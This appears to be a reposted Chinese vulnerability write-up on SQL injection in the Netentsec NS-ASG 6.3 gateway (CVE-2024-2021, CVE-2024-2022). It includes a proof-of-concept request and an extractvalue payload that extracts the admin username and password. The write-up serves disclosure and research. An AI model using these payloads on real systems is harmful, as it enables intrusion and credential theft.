网康应用安全网关NS-ASG 6.3存在sql注入
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
漏洞详情
官网地址
https://www.netentsec.com/漏洞代码存在位置
/admin/list_localuser.php/admin/list_ipAddressPolicy.php
漏洞分析
0x01 CVE-2024-2021
/admin/list_localuser.php,ResId通过payload输入可导致SQL注入
上面看出,在delete方法中,接受数组$ResId变量,然后遍历$sourdeststr,从而不受任何限制地注入到SQL中,从而产生SQL漏洞。
登录账号密码,按如下方式构造POC,成功验证UserId[]参数中是否存在SQL注入,并可获取到当前数据库名称:
GET /admin/list_localuser.php?action=delete&UserId[]=111*&&UserId[]=222 HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=8f6eb605230a5ac1e25d4bc6478a140d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
可跑出payload和其他信息~
0x02 CVE-2024-2022
/admin/list_ipAddressPolicy.php,GroupId通过payload输入可导致 SQL注入
https://x.x.x.x/admin/list_ipAddressPolicy.php?GroupId=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)))
原文始发于微信公众号(不秃头的安全):漏洞挖掘 | 网康应用安全网关NS-ASG 6.3存在sql注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论